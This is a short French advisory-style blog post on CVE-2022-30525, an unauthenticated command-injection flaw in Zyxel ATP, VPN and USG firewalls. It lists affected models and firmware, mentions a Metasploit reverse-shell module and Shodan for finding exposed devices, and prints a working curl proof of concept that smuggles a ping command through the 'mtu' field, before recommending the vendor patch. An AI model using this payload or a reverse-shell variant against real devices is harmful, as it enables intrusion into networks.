Zyxel Firewall faille critique

Zyxel est un fabricant taïwanais de commutateurs réseau, pare-feux et VPN.

Plusieurs de leur produits sont vulnérables à cette faille CVE.

Les modèles touchés sont les séries ATP et VPN, les modèles USG 100(W), 200, 500, 700 et Flex 50(W)/USG20(W)-VPN.

Les versions de firmware vont de la version 5.00 à la version  5.21 Patch 1.

Cette attaque dispose déjà d’un module Metasploit permettant d’avoir un reverse shell au sein de votre réseau.

Exemple d'attaque sur la faille CVE Zyxel

La liste des équipements ciblés est relativement populaire. Environ 16600 dans le monde et 3100 en France. On peut d ailleurs facilement en trouver grâce à SHODAN.

Alors l’attaque déjà se fait via une injection de commande de manière anonyme direct dans l’interface web en passant par l’url /ztp/cgi-bin/handler.

				
					curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler
				
			

Ici on est gentil on fait un simple ping mais vous pourriez très bien mettre en place un reverse shell et la bienvenue dans le réseau. 

Zyxel CVE comment vous en protéger?

Zyxel a mis a disposition un patch qui permet de fixer la vulnérabilité, vous devez donc mettre à jour vos équipements.

Information Valeur

CVE

CVE-2022-30525

CVE publié le

12/05/2022

Score

10

Fuite de données

Critique

Intégrité Système

Critique

Impact sur les ressources

Critique

Compléxité

Facile

Authentification requise

Non